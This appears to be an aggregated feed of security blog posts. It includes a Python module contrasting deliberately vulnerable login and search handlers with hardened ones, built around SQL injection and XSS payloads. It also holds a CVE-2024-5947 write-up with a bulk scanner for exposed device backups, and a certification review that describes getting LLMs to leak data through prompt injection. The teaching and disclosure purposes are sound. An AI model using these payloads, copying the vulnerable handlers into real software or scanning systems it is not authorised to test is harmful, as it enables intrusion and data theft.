How to Get Started in Bug Bounty Hunting: A Comprehensive Beginner's Guide was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
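The four scenarios above each rely on one missing server-side control. The following module, an added example that is not part of the original guide, pairs the naive behaviour each scenario exploits with the hardened handler a defender would ship, using the guide's own payloads as inputs. The function names, the allow-lists and the in-memory SQLite user table are all constructed for illustration.

```python
"""
Hypothetical hardened handlers for the four bug bounty scenarios
(reflected XSS, upload-to-RCE, SSRF, SQL injection). Added example; the
function names, allow-lists and sample data are constructed, not taken
from any real application.
"""
import html
import ipaddress
import os
import sqlite3
from urllib.parse import urlsplit


# --- Scenario 1: reflected XSS on a search page ---------------------------
def render_search_naive(query: str) -> str:
    # Raw query concatenated into HTML: a <script> payload comes back as markup.
    return f"<p>Results for: {query}</p>"


def render_search_safe(query: str) -> str:
    # Escaping turns <, >, & and quotes into entities, so the payload is inert text.
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


# --- Scenario 2: RCE through file upload ----------------------------------
ALLOWED_UPLOAD_EXT = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}  # constructed allow-list


def upload_allowed(filename: str, content: bytes) -> bool:
    """Allow-list the extension and reject bodies containing a PHP open tag.

    Real deployments also store uploads under a server-generated name and
    serve the upload directory with script execution disabled; this check
    alone only stops the straightforward .php upload from the guide.
    """
    ext = os.path.splitext(filename.lower())[1]
    if ext not in ALLOWED_UPLOAD_EXT:
        return False
    if b"<?php" in content.lower():
        return False
    return True


# --- Scenario 3: SSRF via a URL-fetching parameter -------------------------
def fetch_url_allowed(url: str, allowed_hosts) -> bool:
    """Syntactic check on the hostname: only http(s), no localhost, no
    loopback/private/link-local literals, and the host must be allow-listed.
    allowed_hosts is a set of lowercase hostnames (constructed by the caller).
    A production filter must additionally validate the address the name
    resolves to, because DNS can point an allow-listed name at 127.0.0.1.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname.lower()
    if host == "localhost" or host.endswith(".localhost"):
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # not an IP literal
    if ip is not None and (ip.is_loopback or ip.is_private or ip.is_link_local):
        return False
    return host in allowed_hosts


# --- Scenario 4: SQL injection in a login form ----------------------------
def _users_db() -> sqlite3.Connection:
    # Constructed sample table with one account. Password is stored in
    # cleartext only to keep the example short; real systems hash it.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    return conn


def login_naive(username: str, password: str) -> bool:
    # String concatenation: the quote in admin' OR '1'='1 closes the literal
    # and the OR makes the WHERE clause true for every row.
    sql = (f"SELECT 1 FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return _users_db().execute(sql).fetchone() is not None


def login_safe(username: str, password: str) -> bool:
    # Parameterised query: the payload is compared as a plain string value.
    row = _users_db().execute(
        "SELECT 1 FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    payload = "admin' OR '1'='1"
    print("naive login with payload:", login_naive(payload, payload))
    print("safe login with payload: ", login_safe(payload, payload))
    print(render_search_safe("<script>alert('XSS')</script>"))
```

Running the module shows the naive login accepting the guide's payload while the parameterised version rejects it, which is exactly the difference a report for Scenario 4 should explain to the receiving team.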

by InfoSec Write-ups

Recently, during a routine security assessment, I uncovered a significant flaw in the Deep Sea Electronics DSE855 device. This vulnerability, identified as CVE-2024-5947, pertains to an authentication bypass issue that allows unauthorized access to sensitive information. Here's how I discovered and explored this vulnerability.

The Discovery

While examining the target, I focused on the device's web-based interface and noticed a peculiar behavior. The Deep Sea Electronics DSE855 was exposing a configuration backup file at http://xxxxxxxxxx/Backup.bin. This file was accessible without any authentication, raising red flags.

Understanding the Vulnerability

Bug Name: Deep Sea Electronics DSE855 — Authentication Bypass
Bug Priority: Medium
Vulnerable URL: http://xxxxxxx/Backup.bin

CVE Description:
CVE-2024-5947 highlights a critical issue in the Deep Sea Electronics DSE855's configuration backup process. The vulnerability arises from a lack of authentication before accessing sensitive information stored in the backup file. This issue, documented as ZDI-CAN-22679, allows network-adjacent attackers to retrieve the backup file without proper authorization, potentially exposing sensitive data such as stored credentials.

Impact

The exposed backup file can contain sensitive configuration details that could be leveraged by an attacker to compromise the system further. Accessing this file could lead to unauthorized disclosure of credentials and other critical information, increasing the risk of a security breach.

Steps to Reproduce

To confirm the vulnerability, follow these steps:
1. Access the Vulnerable URL: Open the URL in your browser: http://xxxxxxxxx/Backup.bin
2. Observe the File Access: If the backup file is accessible without any authentication, you can view or download its contents, confirming the vulnerability.

Automating the Hunt

To streamline the process, I built a Python tool specifically for detecting this vulnerability. You can install it using pip and automate your testing:

Tool: POC: CVE-2024-5947 on GitHub

pip install CVE-2024-5947
CVE-2024-5947 --chatid <YourTelegramChatID>

To Check a Single URL:
CVE-2024-5947 -u http://mytargetprogram.com

To Check a List of URLs:
CVE-2024-5947 -i urls.txt

Remediation:
To mitigate this vulnerability, it is essential to remove the .bin file from the server and ensure that sensitive files are protected with proper authentication mechanisms.

POC by: @karthithehacker
Mail: contact@karthithehacker.com
Website: https://www.karthithehacker.com/

If you're interested in our VAPT service, contact us at ceo@cappriciosec.com or contact@cappriciosec.com.
For enrolling in my cybersecurity and Bug Bounty course, WhatsApp +91 82709 13635.

Connect with me:
Twitter: https://twitter.com/karthithehacker
Instagram: https://www.instagram.com/karthithehacker/
LinkedIn: https://www.linkedin.com/in/karthikeyan--v/
Website: https://www.karthithehacker.com/
Github: https://github.com/karthi-the-hacker/
npmjs: https://www.npmjs.com/~karthithehacker
Youtube: https://www.youtube.com/@karthi_the_hacker

Thank you
Karthikeyan.V

The Discovery of CVE-2024-5947: Authentication Bypass in Deep Sea Electronics DSE855 was originally published in InfoSec Write-ups on Medium.

by InfoSec Write-ups

Skynet better watch out…

My hard fought cert…

Before this week, I didn't even know this existed. I have been casually looking around for any way to certify that I have acquired a certain set of skills in hacking generative AI and LLM apps, to no avail.

Then, one day I was casually scrolling my LinkedIn feed and I came across this:

Certified AI/ML Pentester (C-AI/MLPen) - Review

Lo and behold, The SecOps Group launched this certification back in July! I jumped on it immediately. That 80% discount, on a £250.00 base price ($328.25 USD, and $66 USD when discounted), was too good to pass up. I had to buy a voucher.

It's also notable that you get one free retake and your voucher is for life with each purchase.

The Preparation

"But Kelvin," you say, "What type of prep work did you do if you just heard about the certification this week?"

Well, I've basically spent most of 2024 learning how to:
- Get LLMs to leak sensitive data
- Directly and indirectly inject malicious instructions within prompts
- Come up with my own (admittedly a bit outdated now) proof-of-concept attacks on LLMs

But for someone who hasn't spent the better part of 2024 trying to prevent the takeover of Skynet, where would they go to prepare?

Full disclosure, as of this writing (August 30, 2024), The SecOps Group does not offer any formal training for this exam. They offer mock exams for many of their practical pentesting exams, but it wasn't yet available for the C-AI/MLPen exam before I decided to go for it.

(Edit: As of 3rd of Sept, 2024, the mock exam for the C-AI/MLPen is now available.)

Thankfully, they don't leave you hanging, because the promo page tells you everything you need to know:

Pictured: No lies.

They also link you a whole host of pertinent resources. In my honest opinion, the single best resource is Lakera AI's Gandalf. However, you will be ill-prepared if you don't read and understand the very many other resources they link, and test various attacks across different LLMs and configurations.

If you have the time, inclination, and ability, I'd also recommend engineering your own AI chatbot(s) to test various offensive and defensive techniques. Part of my AI-related studies this year were in engineering various generative AI tools and services to better understand them. I acquired Microsoft's AI-900 and have even been studying (off-and-on) for the AI-102 exam. I truly believe this has helped me tremendously.

If you know how to connect your AI to a database, you know how to access that database, and thus intuitively know how to get it to leak that database…

The Exam

What I like most about this exam is that it's 100% practical.

The C-AI/MLPen is essentially a CTF where you're given access to 8 different AI models and you take the fictional role of an application pentester tasked with testing each model's defenses. Each has its own unique configuration, and each will require different approaches to coax out their corresponding flag. You will be using real exploits and malicious payloads.

While there are technically "questions" that you have to answer, the "answers" are the flags you get from getting the different LLMs to divulge their secret, Gandalf-style.

When you first buy a voucher you're given a VPN file to access the exam environment. I had one brief moment where I had to disconnect and reconnect to the VPN to regain access to the exam environment, but otherwise it was very stable.

The total exam time is 4 hours and 15 minutes, which is fair for what they're asking from you. It's points based, and you need at least a 60% to pass. Essentially, as long as you get 6 of 8 total flags, you have a high chance of passing. I was able to capture 6 flags early but I was unable to get the final couple and eventually my exam time ran out. Thankfully, this was still enough to pass.

I should call out that I think I broke one of the AI models to the point that it couldn't give me the flag even if it wanted to. Without going into too much detail, after a certain point, its output was just… wrong and went well beyond hallucination. While I wasn't able to retrieve a flag, it was showing me things that I probably shouldn't have been seeing.

I should also call out that even though I said Lakera AI's Gandalf is the single best resource for exam takers, the exam itself is by no means as easy as Gandalf. The C-AI/MLPen exam is much, much more difficult.

For example, I've done Gandalf at various times over the past few months, and I have always been able to casually get through the flags without much effort. For C-AI/MLPen, none of my usual exploit attempts worked and I had to dig deep and research furiously to come up with solutions.

Conclusion

Would I recommend that anyone interested take this exam?

Yes!

For the price alone, there is very little reason to pass it up. It's also certainly worth it for the challenge.

Probably my only negative, and I'll admit it is a bit nitpicky, is the abbreviation of the certification, C-AI/MLPen. It's a bit much. I'd honestly recommend that The SecOps Group shorten it to "CAIP" or "CAIPen" if they want to keep their usual naming scheme. As someone with several certifications already, I'm trying to reduce the amount of alphabet soup in my email signature.

(Edit: To explain it better, our email and LinkedIn DM signatures are prime real estate. I'm entering mid-career, and I have six IT/cybersecurity certifications right now. I'm a firm believer in only showing five at a time, maximum, but preferably only three or four. So I basically choose which ones I want to advertise with each email and DM I send to people. Each message I send is free advertising for both me (showing off my knowledge/skills) and the cert body (piquing interest in a certification from potential exam takers). The longer the certification's name, the less likely I'll want to add it to my signature, and I'm not alone in that sentiment. From a cert body's perspective, you want as many people showing off your credentials as possible.)

Will this certification get your resume past job candidate ATS or HR managers' scrutiny? Most likely not. It's barely a month old, and our industry is slow to widely adopt newer certifications.

However, there is precious little competition right now in this space for AI pentesting certifications. As far as I'm aware, this is your only way of certifying your skills, outside of sharing your proof-of-concepts on GitHub or getting CVEs attributed to you. Having this in your back pocket can be a great talking point during an interview.

If you're a web app pentester, AI engineer, or anything IT or cybersecurity-related, I feel it would be worth it to give this your time.

Thanks for reading!

Certified AI/ML Pentester (C-AI/MLPen) Review was originally published in InfoSec Write-ups on Medium.

by InfoSec Write-ups

Here's what the experts recommend when you need to create a new password -- and one rule likely goes against what you're made to do at work.

by ZDNET Security